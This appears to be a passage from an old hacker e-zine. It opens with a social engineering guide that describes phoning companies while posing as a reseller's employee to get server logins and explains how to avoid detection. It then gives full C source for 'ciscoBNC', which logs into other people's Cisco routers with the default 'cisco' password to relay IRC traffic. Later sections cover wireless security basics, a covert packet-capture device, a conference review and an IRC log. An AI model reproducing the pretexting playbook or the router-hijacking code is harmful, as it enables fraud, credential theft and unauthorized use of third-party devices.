concunction of being technically savvy, and being organised and believable, you are a major security threat. In this paper, I hope to help unleash, and evolve, the social engineering skills within you, because of course, everyone has at one stage in their life social engineered. %%%%%%%%%%%%%%%%%%%%%%%%%% %% What Is: %% %% Social Engineering %% %%%%%%%%%%%%%%%%%%%%%%%%%% Social Engineering is decieving and manipulating a target. Social engineering tactics are usually done with the medium of a telephone; It's easier to attack without being seen, and when carried out correctly, is mostly flawless granted that you manipulate the operator into beliving that you are, acutally who you say you are. For most operators, if someone rings up, it's not out of the ordinary to be requesting information, and their job description consists of supplying you with this -- It's not hard to get something you want, from someone that is offering it to you! %%%%%%%%%%%%%%%%%%%%%%%%%% %% Doing Your Homework: %% %%%%%%%%%%%%%%%%%%%%%%%%%% Doing your homework on the target that you will be attempting to gain information from is a vital part of the social engineering proccess. You need to know what you want, how you want it, and you have to get the point across with a very positive and confident attitude -- Make it believeable! Do not stumble over your words; Everything has to be clear, concise and professional. When studying about the target, it is essential to only concentrate on the details that actually matter. Study the terminology used in the industry, you don't want to sound clueless when asked a question, background information is imperative. %%%%%%%%%%%%%%%%%%%%%%%% %% Being Manipulative %% %%%%%%%%%%%%%%%%%%%%%%%% Being manipulative when carrying out a social engineering attack is a neccessity, this is how you will influence the target and controlling them to do, what you exactly want them to without them even realising it. It's a very skillful, under the radar technique that will help you graciously. Again, being manipulative means you have to be familiar with the target, referring back to the "Doing your homework" section, Study the corporate information of the target, find out how their operation runs, and use it to your advantage. Use the operators name when being greeted; It's usually procedure for them to introduce themselves to the call -- This shows that you are calm, confident, and alert. Refer to an employee that works there, this gives the operator the impression that you are familiar with the company, and takes the call to a more personal level; This relieves the thought of them thinking otherwise when requesting the information you desire. There are two levels you can manipulate on. You can either claim to be a customer of the target; Used to obtain legitimate customers account information, Or claim to be a staff member in another department/employee of a company that the target deals with. NOTE: Both can be very effective if the attack is carried out correctly. %%%%%%%%%%%%%%%%%%%%%%%%%%%% %% Finding A Target: %% %% Practice Makes Perfect %% %%%%%%%%%%%%%%%%%%%%%%%%%%%% Before attempting to carry out a social engineering attack on a high profile target, practicing on smaller, more vulnerable companies is very valuable; There's no room for mistakes, especialy when the consequences can mean a pretty heavy jail term. Attempt to social engineer your local ISP; Most local ISPs resell their services from a larger mainstream provider. Claim to be an employee of the company which resells their services to the target; Remember to introduce yourself in a clear and concise manner, sound confident, and ask for the right people in the correct department. This opens an array of doors of where you want to take the attack, whether it be updating their payment details in your system, or confirming radius server logins for an urgent security maintenance which needs to be undertaken immediatley on their managed server -- Have this planned, you need to know exaclty what you have to say, every step of the call, do not miss a beat. Do not sound too eager to gather the information, remember, manipulate them. Make them believe that it a security issue on their behalf, and without the proper fix, their current operation won't be running smoothly; It's all about them! Advise them on how long it will be before the maintentance is complete. Once the supposed maintenance has been completed in the timeframe you have given them, provide them a courtesy callback that the issue has been resolved. This strikes out the risk of them calling the mainstream provider to see whats happening with the update, and minimises the risk of being caught. %%%%%%%%%%%%%%%%%%%%%%%%%% %% Easy? Not Quite. %% %%%%%%%%%%%%%%%%%%%%%%%%%% It's not always going to be so easy, at times you may find yourself to be in a heated situation, remain calm, stay in character, offer a callback from one of your superiors to have the situation sorted out, do whatever means neccessary. Remember, once you start digging your way through the inner workings of a target, it's only going to get harder. The most vulnerable part of a company are their employees. Operators may be easy to exploit, but when speaking to senior representatives, and executives of the company, it's going to be a whole lot more challenging. %%%%%%%%%%%%%%%%%%%%%%%%%% %% Conclusion %% %%%%%%%%%%%%%%%%%%%%%%%%%% So, This concludes my paper. Hopefully this outlines what you need to know on your journey as a Social Engineer. There are social engineers everywhere, so the next time you pick up a call, You may have to try twice as hard to identify who you are actually talking to! Have Fun! %%%%%%%%%%%%%%%%%%%%%%%%%% %% References %% %%%%%%%%%%%%%%%%%%%%%%%%%% Here's some papers and books that will help you. There are alot of factors to cover, please visit some of these offsite links for your benefit: - Paper: Social Engineering - Link: - Author: Aaron Dolan - Book: The Art Of Deception: Controlling the Human Element of Security - Link: - Author: Kevin Mitnick - Paper: Social Engineering: It's a matter of trust - Link: - Author: Douglas Schweitze -------------------------------------------------------------------------------- [ciscoBNC]==============================================[Chrak <chrak@b4b0.org>] -------------------------------------------------------------------------------- [ Editer's note: Chrak was supposed to do a writeup of this for kv, but he's been missing in action for a while. I decided to include it as is. ] /* Written 2005 by chrak <chrak@b4b0.org> <> shoutoutz to #b4b0 and #c1zc0 @ EFNet ircclient -> ciscoBNC -> router -> ircserver /server ciscoBNCserv 7777 /quote doitup 1.1.1.1 mypass irc.LOL.com 6667 this is version 0.9, next will have more bug fixes, error checking, password pro tection, ability to disconnect and resume irc sessions, lists of DOITUPs stored! can someone email me if they know how to turn off IOS> shell echoing? This code is distributed under the GNU Public Licence (GPL) version 2. See for further details of the GPL. If you do not have a web browser you can read the LICENSE file in this directory. **/ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <string.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> #include <netdb.h> #include <signal.h> #include <time.h> #define D_VER "0.9" #define D_PORT "7777" #define D_REALNAME "ciscoBNC user" int create_server (unsigned int port); int server_notice (int sock, char *msg); int server_notice_from (int sock, char *msg, char *from); int serve_client (int sock); int relay_client_and_router (int sock, int r_sock); int rnd1toN (int max); void startdaemon (void) { switch (fork ()) { case -1: perror ("fork()"); exit (1); case 0: /* child */ break; default: /* parent */ exit (0); } if (setsid () == -1) { perror ("setsid()"); exit (1); } //fclose(stdin); //fclose(stdout); } // vhost = NULL for no bind() int connect_to_tcphost (const char *hostname, unsigned int port, const char *vhost) { int sock; struct hostent *he, *hel; struct sockaddr_in saddr; struct sockaddr_in localaddr; if ((sock = socket (AF_INET, SOCK_STREAM, 0)) == -1) { perror ("socket()"); return -1; } if (vhost) { if ((hel = gethostbyname (vhost)) == NULL) { herror ("gethostbyname()"); close (sock); return -1; } memset (&localaddr, 0, sizeof (struct sockaddr_in)); localaddr.sin_family = AF_INET; localaddr.sin_port = 0; localaddr.sin_addr = *((struct in_addr *) hel->h_addr); /* this is to use VHOST */ if (bind (sock, (struct sockaddr *) &localaddr, sizeof (localaddr))) { perror ("bind()"); close (sock); return -1; } } if ((he = gethostbyname (hostname)) == NULL) { herror ("gethostbyname()"); close (sock); return -1; } saddr.sin_family = AF_INET; saddr.sin_port = htons (port); saddr.sin_addr = *((struct in_addr *) he->h_addr); if (connect (sock, (struct sockaddr *) &saddr, sizeof (struct sockaddr)) == -1) { perror ("connect()"); close (sock); return -1; } return sock; } int readline_from_sock (int sock, char *line, int max_read) { int i = 0, retval = 0; bzero (line, max_read); retval = recv (sock, line, max_read, MSG_PEEK); while (line[i] != '\n' && i != max_read && i != retval) ++i; retval = read (sock, line, ++i); line[i] = '\0'; /* terminate the string */ // sloppy but to kill it if (strlen (line) == 0) { fprintf (stderr, "KILLING THIS CONNECTION\n"); exit (0); } return retval; } int main (int argc, char *argv[]) { int sock, csock, l; struct sockaddr_in caddr; fprintf (stderr, "ciscoBNC V%s\nrun with additional arg to make daemon (%s -)\n(chrak@b4b0.org) ()\non port %s\n", D_VER, argv[0], D_PORT); if ((sock = create_server (atoi (D_PORT))) == -1) { // change to stdout so we can see it from PHP!!@!@ fprintf (stderr, "create_server FAIL\n"); exit (-1); } if (argc > 1) startdaemon (); // stop zombies signal (SIGCHLD, SIG_IGN); while (1) { l = sizeof (struct sockaddr_in); if ((csock = accept (sock, (struct sockaddr *) &caddr, &l)) == -1) { perror ("accept()"); exit (-1); } fprintf (stderr, "connection from: %s\n", inet_ntoa (caddr.sin_addr)); switch (fork ()) { case -1: perror ("fork()"); //write(csock,"fork():ERROR\r\n",strlen("fork():ERROR\r\n")); exit (1); case 0: /* child */ server_notice (csock, "connected to ciscoBNC!"); { serve_client (csock); } close (csock); exit (0); default: /* parent */ close (csock); } } } int create_server (unsigned int port) { int sock, l = 1; struct sockaddr_in saddr; if ((sock = socket (AF_INET, SOCK_STREAM, 0)) == -1) { perror ("socket()"); return -1; } setsockopt (sock, SOL_SOCKET, SO_REUSEADDR, &l, sizeof (int)); saddr.sin_family = AF_INET; saddr.sin_port = htons (port); saddr.sin_addr.s_addr = INADDR_ANY; if (bind (sock, (struct sockaddr *) &saddr, sizeof (struct sockaddr)) == -1) { perror ("bind()"); return -1; } /* only 5 connection at a time heh!@ */ if (listen (sock, 5) == -1) { perror ("listen()"); return -1; } return sock; } int serve_client (int sock) { char buf[1024]; char doitup[250]; char mbuf[1024]; int connected_to_router = 0; int connecting_to_irc = 0; int sent_pass_once = 0; int r_sock; char *routername; char *routerpass; char *ircservname; char *ircport; char myuser[20], mynick[20]; srand (time (NULL)); // seed random # generator snprintf (myuser, sizeof (myuser), "user%d", rnd1toN (99)); snprintf (mynick, sizeof (mynick), "d0ud%d", rnd1toN (99)); repeatdoitup: routername = NULL; routerpass = NULL; ircservname = NULL; ircport = NULL; server_notice (sock, "**************TO CONTINUE*******************"); server_notice (sock, "HELP ME OUT CLICK ADS AT !!"); server_notice (sock, "/QUOTE DOITUP router routerpass ircserver ircserverport"); server_notice (sock, "EXAMPLE /quote doitup 1.1.1.1 mypass irc.LOL.com 6667"); while (1) { if (readline_from_sock (sock, buf, sizeof (buf)) == -1) { perror ("readline_from_sock()"); //change. return -1; } if (!strncasecmp (buf, "DOITUP", strlen ("DOITUP"))) { char *p; strncpy (doitup, buf, sizeof (doitup)); if ((p = strtok (doitup, " \r\n"))) { while ((p = strtok (NULL, " \r\n")) && (!routername || !routerpass || !ircservname || !ircport)) { if (!routername) routername = p; else if (!routerpass) routerpass = p; else if (!ircservname) ircservname = p; else if (!ircport) ircport = p; } if (!routername || !routerpass || !ircservname || !ircport) goto repeatdoitup; // fuck you snprintf (buf, sizeof (buf), "OK.. connecting to router %s with pass %s,ircserver %s: %s\n\nQUOTE something else if nothing happens\n", routername, routerpass, ircservname, ircport); server_notice (sock, buf); goto doitup_done; // goto } else { goto repeatdoitup; //LOL } } } doitup_done: while (1) { if (readline_from_sock (sock, buf, sizeof (buf)) == -1) { perror ("readline_from_sock()"); //change. return -1; } if ((r_sock = connect_to_tcphost (routername, 23, NULL)) != -1) { connected_to_router = 1; snprintf (mbuf, sizeof (mbuf), "connected to %s", routername); server_notice (sock, mbuf); while (1) { if (readline_from_sock (r_sock, buf, sizeof (buf)) == -1) { perror ("readline_from_sock()"); //change. // do something } else { // buf[strlen (buf) - 1] = '\0'; if (strstr (buf, "assword:")) // send router passwd { if (sent_pass_once) // failed already. reprompted { // test this server_notice (sock, "ROUTER PASSWORD FAILED!!!"); return -1; } sent_pass_once = 1; server_notice_from (sock, "Logging into router...", "ciscoBNC"); write (r_sock, "cisco\r\n", strlen ("cisco\r\n")); } else if (buf[strlen (buf) - 1] == '>') // got cmd prompt { if (connecting_to_irc) // failed. back at prompt. { server_notice (sock, "connect irc port FAILED!!"); return -1; } server_notice_from (sock, "trying connect irc server", routername); // write (r_sock, // "telnet Sterling.VA.US.UnderNet.org 6667\r\n", // strlen // ("telnet Sterling.VA.US.UnderNet.org 6667\r\n")); snprintf (buf, sizeof (buf), "connect %s %s\r\n", ircservname, ircport); write (r_sock, buf, strlen (buf)); connecting_to_irc = 1; } else if (strstr (buf, "Open")) // connection opened! { snprintf (buf, sizeof (buf), "USER %s %s %s %s\r\n", myuser, routername, ircservname, D_REALNAME); write (r_sock, buf, strlen (buf)); snprintf (buf, sizeof (buf), "NICK %s\r\n", mynick); write (r_sock, buf, strlen (buf)); relay_client_and_router (sock, r_sock); return 0; } } } } else { // fail! return -1; } } } int server_notice (int sock, char *msg) { char buf[1024]; snprintf (buf, sizeof (buf), "NOTICE * :%s\r\n", msg); return write (sock, buf, strlen (buf)); } int server_notice_from (int sock, char *msg, char *from) { char buf[1024]; snprintf (buf, sizeof (buf), "%s: %s", from, msg); return server_notice (sock, buf); } // assumes we are connected to irc server from router already. int relay_client_and_router (int sock, int r_sock) { char buf[1024]; char buf1[1024]; fd_set rfds; int retval; while (1) { FD_ZERO (&rfds); FD_SET (sock, &rfds); FD_SET (r_sock, &rfds); retval = select (1023, &rfds, NULL, NULL, 0); if (retval) { if (FD_ISSET (sock, &rfds)) { if (readline_from_sock (sock, buf, sizeof (buf)) > 0) { write (r_sock, buf, strlen (buf)); strncpy (buf1, buf, sizeof (buf1)); // save last thing sent.we will need this to stop shell echo from IOS. } // else.. } if (FD_ISSET (r_sock, &rfds)) { if (readline_from_sock (r_sock, buf, sizeof (buf)) > 0) { if (strcmp (buf, buf1)) write (sock, buf, strlen (buf)); else { // printf ("IGNORING IOS ECHO\n"); } // else } } } } } int rnd1toN (int max) { return (rand () % max) + 1; } -------------------------------------------------------------------------------- [Wireless Technology Exposed]========================[Vortek <vortek@gmail.com>] -------------------------------------------------------------------------------- Wireless Technologies Exposed Security and Specifications demystified VORTEK Knowledge is a process of piling up facts; wisdom lies in their simplification Martin H. Ficher Greetings, the purpose of this article is to explain a few things about wireless. I will not go in depth to the security features of IEEE 802.11 specification families. However, I will cover the basics so you will understand enough to distinguish between the different specifications. You will know which to apply based on its level of security, And hopefully you will have enough knowledge to decide for your self. NOTE: I Will assume you know the RAW basics of some things. If you do not google.com them. This article is not meant to be a novel. Besides you will learn a thing or two. Now Grab your favorite beer, wraps or stimulant drink and lets get started! Grab that shit I'm serous! The IEEE 802.11 family of specifications are broke down into 4 types. Well 3 officially. We will begin by breaking down the basics of each type and its features. We will cover its air waves its basic features of speed range and such. And its basic security. The first Specification we will start with is older than an unpatched chinese server. I didn't cover plain 802.11 Because its ANCIENT! 802.11A This specification operates on the 5GHz band. Which is good because most of your current house hold phones work on the overcrowded 2.4GHz band. The downfall to this higher frequency range is its inability to penetrate walls and obstructions, which can be quit cumbersome. It also carries a higher cost for its equipment. Let alone its crappy range. Expect to get a maximum speed of 54 Mbps Now the A specifaction uses orthogonal frequency division multiplexing (OFDM). OFDM basically splits radio signals into a lot of smaller sub-signals, which in turn are transmitted simultaneously to different frequencies towards the receiver. This reduces some of the crosstalk also. If you'd like more info on OFDM google it. This is an article not a novel. 802.11B This specification operates in the 2.4Ghz band. This means overcrowded, Don't use close to microwaves or 2.4Ghz Cordless phones. Now this frequency penetrates walls a heck of a lot easier. Set your channels right on your Wireless Router and your signal can go 3 floors down. You also get much more range with B. Now don't expect much speed from this specification it's only 11 Mbps, But its more of a stable signal. These products also tend to be cheaper in cost and more widely used. The 802.11B Specification uses direct sequence spread spectrum (DSSS). Basically there is a chipping code that uses a redundant bit pattern for each bit that is transmitted, which in return aids in resistance to interference. If any of the bits are corrupted the original data will be recovered due to the redundancy of the transmission. Basically THIS MEANS ERROR CORRECTING! Want more info google for DSSS. 802.11G This is nothing more then the best of A and B mixed. It's 2.4Ghz At 54Mbps. It is also backwards compatible with b. G also uses OFDM. Now there are some routers that go way beyond 54Mbps with Turbo modes, But why? Your not running a some huge FiberObtic network are you? 802.11 (pre) N We will cover this after the security section which I will explain later. Ok the security of these are basically all the same. Crappy WEP and WPA1 which is basically nothing more then what was working from 802.11I at the time. We all know why WEP is insecure. It breaks the #1 cardinal RULE OF RC4 NEVER EVER REPEAT THE KEYS. The problem with WEP is not in RC4 in itself as you can see. The problem is the idiots who made 802.11 did not specify how IV"s "Initial Vectors" should be created, also the algorithm is pure crap. WEP uses 24 bits for its IV value range which as you can see, we could easily use this up with high volume traffic. This basically means that the same IV will be used with a different datapacket! "BREAKING THE RC4 Cardinal RULE!" What, you ask well what if there is no traffic? There are methods to force traffic. >:) IF you want to know them Read a WEP cracking tutorial. There are plenty of good ones on google.com. Now just to clarify a few things, You may wonder what the IV really is. 24-bit values are attached to the secret key and used in the RC4 cipher stream. The reason we have IVs is to ensure that the value used as a seed for the RC4 PRNG "Pseudo Random Number Generator" is always different. Ok what does all this mean ? I record all your wep traffic until I receive 2 packets that have the same IV aka RC4 keys I can use a XOR function to link 2 packets and compute the key. In other words Do not use WEP AT ALL. I don't care how elite your crypto key is. Ok now lets cover WPA1, Which is basically nothing but a TKIP "Temporal Key Integrity Protocol" wrapper around wep. For starters this prevents the repeat attacks that WEP has by extending the IV to 48 bits. And by now we all know that IV's are used to encrypt the data in the packet. Now TKIP adds a few security enhancements to wep. The first is Cryptographic message integrity code (MIC). Which prevents forgery. Its basically a cryptographic checksum that protects against forgery attacks. The second feature IV sequencing (TSC) "TKIP Sequence Counter" prevents replaying of data. Basically if the TSC in the IV better match with in a certain range when received or the packets are drooped. The 3rd method is the Per-Packet mixing function. Basically this means that were changing the encryption key every now and then for the client. It also provides a integrity checker. This method is a little to advanced to cover here.. Now remember boys and girls this is all based on RC4. Now the good stuff WPA2 WPA2 is a full implementation of certified 802.11I. It uses AES-CCMP "(AES-C)Gunter Mode (C)BC-(M)AC (P)rotocol" This is also the standard for the Pre N serious of routers. WPA2 utilizes many advanced features over WPA1 The #1 feature is AES (Advanced Encryption Standard) It's basically Military crypto warez. So no more crappy RC4. It also uses PMK (Pair-wise Master Key) which allows you to reconnect to your access point if lets say you walked to another AP and back. "You will not have to re authenticate." Also Pre-authentication allows you to pre-authenticate to another AP, While holding your connection to your existing AP. Basically you only need 1/10th of second to change AP's while roaming. Now if you don't use Pre-authentication with PMK caching It would take more then a second and some of your time sensitive crap like video, VoIP and other crap will go FUBAR! Ok for the other features. For starters we get forced 128 bit keys!!! h0h0h0h0! Basically every thing else is the same as wpa accept for the AES standard and PMK. But for you people who want more info.. I will just post information from the computing dictionary. Official Computing Dictionary Definition below. "IF you want more info on this your really going to have to do a LOT of reading." There is no point on trying to refine something so short and true.. Call me a copy cat if you like. Ok now time for the phat lady to sing! 802.11 (pre-N) 802.11 (pre-N) This is basically 802.11I with certified WPA2 which in turn is a Full certified implantation of 802.11I. Now the reason we use pre-n Is because there is a battle going on in standards. We will not get into that here. But basically its like what happened in the old days with the 56k modem standards. Rockwell Vs Us Robotic. Now the advantages to PRE-N are huge. You get GREAT EXTENDED RANGE. This is achieved by using something called MIMO (Multiple Input Multiple Output), in which a number of antennas transmit many unique data streams in the same frequency channel (other Wi-Fi products transmit data in a single stream in a single channel). MIMO also uses OFDM. Which you should remember from above. You basically get 3 antennas. The advantages Are more range less interference and a funky looking evil router. Oh yeah its backwards compatible with B and G. Now you know the VERY raw basics of wireless. Well what happens beyond the GUI in your Wintendo XP Wireless configuration. Be sure to upgrade XP to support WPA2. Now lets all go to France And do some war driving, We can hack there WHITE-FLAG Linux boxes. After One failed login you get root and a system message of I surrender. I don't hate French people don't worry! And one last message to all you knew skewl kiddies. READ READ LEARN! And be glad you can google.com For it was not always this easy to GET INFORMATION! Send Hate mail to vortek@gmail.com h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0.......................................... -------------------------------------------------------------------------------- [Harriet the Spy]======================================[Dreid <dreid@dreid.org>] -------------------------------------------------------------------------------- Harriet the Spy =============== What is Harriet the Spy? ------------------------ Harriet the Spy is designed to be a relatively low cost solution for creating a stationary battery-operated wireless packet capture system. Yes but what does that mean? ---------------------------- It means that it's a computer, whose only job is packet capture, and it can be left in one place for an extended period of time, to capture packets for a specific wireless network or set of wireless networks. What is it made of? ------------------- The most basic configuration for Harriet requires a 802.11a or b or g router that is similar or compatible with the Linksys WRT54G(S) series of routers, in that it can run an open source linux based firmware. For my experiments I used a WRT54G version 2 [1], and OpenWRT [2]. It also includes a battery pack made of 4 1.5v Alkaline batteries. How to make it. --------------- The Battery pack. +++++++++++++++++ The battery pack used will likely fall somewhere in this rough description no matter what kind of compatible router you get. The number of batteries you need might vary depending on the actual power usage of the router. I'm not an electrical engineer but I do know that most consumer electronics devices do not require the full output voltage of their DC wall adapters. The WRT54G's for instance has a power output of 12v DC. But it can on 6v DC without any problem. So the basic parts list for this part of the project is this: * 1 DC Size M plug. * 4 1.5v alkaline batteries. * 1 battery holder of the same size. In theory the only thing the cell of the battery would affect in this case would be runtime. So you could use anything from AA to D. I chose D for this as I just wanted to see how long I could keep it running for. The manufacture of this battery pack is very simple and requires very minimum soldering skill (read: you should know which end to hold.) Simply take the wires from the battery holder, and solder them to the positive and negative leads on the DC Size M plug. Insert the batteries into the holder, and that's all she wrote about that. You can now power any device which can be sustained on 6v DC. The Router and OS +++++++++++++++++ Flashing OpenWRT onto a WRT54G or compatible router is a well documented process, and can be found here [3]. The client mode configuration is also well documented and can be found here [4]. When installing kismet you should install the kismet_server package, and turn off the wireless interface prior to starting it. The Test -------- The base test for battery life was to plug in the router, start up kismet, and then take a voltage reading of each battery under load. Then after an hour I'd take the readings again, and approximate how many hours before the batteries were operating at less than 30% capacity. The initial readings where: 1.31, 1.36, 1.35, 1.34 for a total of 5.36V After two hours the voltages read: 1.01, 1.08, 1.05, 0.95 for 4.09V That's a 1.27V difference, if we assume the voltage drop to be linear then every two hours we would lose 1.27V, with 1.78V being the magical 30% capacity mark. So that's about 6hrs of battery life. Which isn't too shabby for the cost of production. You could capture a lot of packets in 6hrs. Potential Problems and Potential Improvements --------------------------------------------- So right now Harriet is capable of sitting around, for 6 hours unattended, and capture packets. Of course since it only has 4mb of storage if you're using a WRT54G, and 8mb if you're using a GS, it can only capture so many packets. Especially since atleast 2MB of flash is being taken up by the OS. However one planned improvement is to add an SD card [5], which will give up to 2GB of storage, other options would be adding a USB port and using an IDE storage device. Yet another option would be using a 802.11b ethernet bridge or usb 802.11b adapter connected to a nearby network for packet capture (just make sure you're not capturing that networks packets.) Another potential problem is that as the batteries lose power, one could potentially damage the router hardware. This problem could be overcome by adding a low-power cut-off circuit. Also the price of D-Cell lead-acid batteries is rather expensive over time, and one could find a much more suitable source of power, including rechargeable NiMH batteries like those used in RC Cars and Airsoft guns, or even the more expensive though very reliable and long lasting Li-Poly batteries for the higher end RC vehicles. Final Thoughts -------------- All things considered I believe the initial revision of Harriet the Spy is quite a success, the next steps in it's evolution will be the abovementioned low-power cut-off circuit, and the addition of an SD card reader. Then I hope to field test the device in a high traffic wireless deployment. After that I'll begin experimenting with a variety of rechargeable and longer lasting battery solutions. Footnotes --------- [1] [2] [3] [4] [5] -------------------------------------------------------------------------------- [Review of ToorCon]===================================================[overdose] -------------------------------------------------------------------------------- Overview of Toorcon, San Diego California's premiere Security conference By OverDose Well first things first, I went to Toorcon , and the first night was a sort of meet and greet. There were a lot of people already there, people that were affiliated with defcon, Layer 1, and a few other conferences I had attended. There were hors d'oeuvres and an awesome social atmosphere. There were of course people talking about newer tools and recent compromises that were public and things that had happened to end users at the employer. Saturday was the day that things got swinging, there were 2 tracks of speakers cleverly name Smoke and Mirrors. The smoke track which is synonymous to digital security, had several speakers ranging from a BBS ( documentary about BBSes and a MUST WATCH) Q&A to how hackers get caught. On the other track Mirrors, synonymous with network security and trust, talks ranged from hacker versus the mobile phone to anonymous On the other track Mirrors, synonymous with network security and trust, talks ranged from hacker versus the mobile phone to anonymous communication for the Dept. of Defense..and you. Saturday night was awesome, the wonderful people at toorcon had set up a party for us in the Galileo 101 in downtown San Diego, really close to the convention center where Toorcon was held. It was a two story bar of sorts, with DJ's spinning lots of house, lounge, trance, and many other electronica styles. The drink were good but expensive. Never the less it was an awesome time to be had by ANY geek who was down for a party. Sunday Sept 18th, the day that was wrapping up the con, but don't let that fool you. There were many people still around and having an awesome time, chatting among each other as well as checking out the Sunday speeches. Sunday's Smoke track ran from everything from Infrared hacking to a law enforcement panel, and the Mirrors portion had Running a small hacker conference panel to the Future of Phishing, it really DID have it all and then some. I want to close by saying thanks to h1kari, nfiltr8, geo, phil,SoMe_BoDy, freshman, arachne, and everyone else that helped put Toorcon together. You guys did an awesome job. One thing I HAVE To bring up was the lax environment and the courtesy towards all of the attendees. If anyone has been to a hacker con, generally you get souvenirs that you must pay for, generally from a vendor area. This is one area that delightedly Toorcon differentiates itself, They gave EVERY attendee an official Toorcon shirt with dates/locations and things of this nature. How cool is it, that these people appreciate each and every attendee that they would give them all an awesome souvenir just for attending? That's all I can say about Toorcon, if you are in the mood for a relaxing and informative time in the San Diego area, I highly suggest you attend Toorcon. -------------------------------------------------------------------------------- [This issues LAMER.log]=====================================[#espionage @ efnet] -------------------------------------------------------------------------------- 1.9 GIGAHERTZ! 1.9 GIGAHERTZ! Yup! This, from the immature guy who went off on someone and told them to read an RF (radio frequency) book! ttransien also claims to be an ex l0pht member, but after talking to him for five minutes it's clear that he's too much of a moron to ever be in l0pht. [20:39] <ttransien> lothos [20:40] <uplink> trans [20:40] <uplink> you code? [20:40] <ttransien> wut [20:40] <ttransien> of course [20:40] <uplink> I learned C [20:40] <ttransien> didn't you download myelite software like everyone else? [20:40] <lothos> ttransien [20:40] <uplink> no [20:40] <ttransien> :-o [20:40] <uplink> haven't even seen it [20:40] * uplink sets mode: +vvvv Christ cia darkhmet lothos [20:40] * uplink sets mode: +vvvv migzy Rav^ v_id |-|acks [20:40] <lothos> your bluetooth software? [20:40] <uplink> :O [20:40] <ttransien> h0h0 mvoice [20:41] * uplink sets mode: -vvvv playd0h trans ttransien uplink [20:41] <uplink> we're leet with +O's [20:41] <uplink> we don't need voiced [20:41] <uplink> we don't need voices [20:41] <ttransien> dewd don't play around you'll soon be out of control [20:41] <uplink> h0h0h [20:41] <uplink> I gotta go for a sec [20:41] <uplink> brb [20:41] <ttransien> you are 17 it is easy to forget things and go out of control [20:41] <ttransien> bye >:D< [20:41] <ttransien> nevermind you are too young to hug that is way gay [20:45] <uplink> h0h0 [20:58] <ttransien> hi [20:59] <ttransien> dood if i sit my cell phone by the monitor [20:59] <ttransien> my monitor flips out right before my ophone rings [20:59] <lothos> iden is notorious for that [20:59] <lothos> speakers as well [20:59] <lothos> and tv [21:00] <ttransien> 1watt or so at maybe 1.9GHz [21:00] <ttransien> but 1.9GHz is not the refresh rate of my monitor! [21:00] <ttransien> and i doubt it's even a harmonic :D [21:00] <ttransien> so i wonder what's happening [21:02] <lothos> those are the worst phones as far as radiation [21:02] <ttransien> i bet it does it if i make a call too [21:02] <ttransien> let me try [21:02] <lothos> yup [21:02] <lothos> and iden works on 800mhz [21:02] <ttransien> iden? [21:02] <lothos> 806-866 MHz [21:02] <lothos> nextel is not gsm [21:02] <lothos> it is iden [21:02] <ttransien> why do you think i'm on that freq [21:03] <lothos> if you have nextel that is your freq [21:03] <ttransien> dood i'm out of the states right now [21:03] <ttransien> as previously mentioned [21:03] <lothos> Integrated Dispatch Enhanced Network [21:05] <lothos> iden is 800mhz [21:05] <ttransien> you've mentioned that [21:05] <lothos> yes [21:05] <ttransien> however i am not in the united states currently as mentioned two or three times [21:05] <lothos> do you have a loaner phone? [21:05] <ttransien> a business phone [21:06] <ttransien> belongs to the company [21:06] <lothos> did they give you a phone to use overseas? [21:06] <ttransien> no, the phone was already overseas [21:06] <ttransien> purchased locally [21:06] <lothos> is that thru nextel? [21:06] <ttransien> of course not [21:06] <ttransien> we use the local network [21:06] <lothos> europe? [21:06] <ttransien> asia [21:06] <lothos> 900mhz or 1800mhz then [21:06] <uplink> yo [21:06] <uplink> I'm gonna get a 5mbit connection [21:06] <lothos> not 1.9ghz [21:07] <ttransien> where do they use 1900 [21:07] <lothos> the usa [21:07] <lothos> 850/1900 is usa gsm [21:07] <ttransien> rgr [21:07] <lothos> i'm guessing you're on 900 mhz from the way it interacts with the monitor [21:07] <ttransien> what in the monitor would resonate at 800mhz [21:07] <lothos> who knows, i just know cellular [21:08] <ttransien> btw my nextel is gsm; it was advertised as such and i used it in singaporre [21:08] <lothos> maybe it is then [21:08] <ttransien> i have to pay more for my plan [21:08] <lothos> you should be able to use it in asia then [21:08] <ttransien> i am getting a call in [21:08] * Christ (c@220-245-133-132-vic-pppoe.tpgi.com.au) Quit (Ping timeout: 276 seconds^O) [21:08] <ttransien> i can see it :D [21:08] <lothos> unless you're in south korea [21:08] <lothos> they use cdma not gsm [21:08] <lothos> or japan [21:08] <lothos> japan does not use gsm [21:09] <ttransien> i don't know what bands my phone supports [21:09] <ttransien> i do have it in a box somewhere i just didn't try [21:09] * Christ (c@60-240-128-36.tpgi.com.au) has joined #espionage [21:09] <lothos> what country are you in? [21:09] <ttransien> i have a locally purchased phone paid for y the company [21:09] <ttransien> i am in cyberia :D [21:14] <ttransien> anyway let's talk until my ride gets here [21:14] <ttransien> i have nothing else to do [21:14] <ttransien> entertain me [21:15] <ttransien> ok i'll begin [21:15] <ttransien> it is interesting to note that the interference only occurs before the phone rings [21:15] <ttransien> which leads me to believe 2 things [21:15] <ttransien> 1 - the phone ramps down power during negotiation with the tower [21:15] <ttransien> 2 - i have a good signal [21:15] <ttransien> 2 is confirmed by my signal bars on the display [21:16] <ttransien> uplink would you like to interject an observation at this point? [21:17] <ttransien> bbl [21:17] * ttransien (~transient@get-o.net) Quit (^B[^BBX^B]^B Pretzel Boy uses BitchX. Shouldn't you?^O) -------------------------------------------------------------------------------- [/dev/urandom]=========================================[Random Facts and links ] -------------------------------------------------------------------------------- # The Most Annoying way to make a pop-up, EVER. # Make a website not display for people using Internet Explorer: <? if (preg_match("/MSIE/i", $_SERVER["HTTP_USER_AGENT"])) { header("Location:"); exit(); }; ?> <html> <head> <title>This site will not display in Internet Explorer</title> </head> <body> </body> </html> # SMS email gateways for the US cellular providers: # Practical Resources for Securing Computers: -------------------------------------------------------------------------------- S U B M I T T O K E E N V E R A C I T Y -------------------------------------------------------------------------------- NO! You do not have to be a member of Legions of the Underground to submit to KV. If you have a idea and would like to toss it out in the wind for general discussion, or maybe you are researching something and you just want feedback, KV is a great way to get your ideas out in the open. We at Legions of the Underground are not prejudice in any way shape or form, so even a AOLer's article may be published if it seems that it has clue. Or then again, maybe hell will freeze over! Anyones stuff maybe published, but we will never know if you don't submit! So get to writing. Because what you don't know can kill you! Legions of the Underground is a equal opportunity destroyer (of systems and great walls alike). -------------------------------------------------------------------------------- All submissions to: kv@legions.org -------------------------------------------------------------------------------- IRC: Undernet 